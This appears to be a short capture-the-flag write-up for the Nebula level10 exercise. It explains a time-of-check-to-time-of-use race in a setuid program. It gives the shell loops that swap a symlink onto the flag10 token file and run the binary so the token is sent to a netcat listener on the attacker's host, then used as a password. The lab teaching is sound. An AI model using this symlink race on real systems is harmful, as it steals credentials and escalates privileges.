Ah, race condition at last!
After initial reading we can quickly conclude: it’s a standard TOCTOU vulnerability (which also is clearly mentioned in
access() man page). Apart from that we need to note that
token is sent over network so we have to receive it somehow (
nc for the president!).
First things first we will run
nc in an infinite loop on our host machine:
host$ while true ; do nc -l 18211 ; done
nc will listen on port
18211 and not terminate after receiving each message from
Back to Nebula VM — we need to have two running terminals.
On the first terminal we execute the following command:
vm$ while true ; do ln -s msg lnk && rm lnk && ln -s /home/flag10/token lnk && rm lnk ; done
Which creates dangling symlink.
On the second terminal we execute:
vm$ while true ; do /home/flag10/flag10 /tmp/lnk 192.168.1.10 ; done
Which tries executing
/home/flag10/flag10 in an infinite loop with input file as
/tmp/lnk (which is our dangling symlink).
After couple of iterations you will see proper key on your host’s
nc instance, from here on you only need to do
su flag10 with the token as password.
level10@nebula:/tmp$ su flag10
You have successfully executed getflag on a target account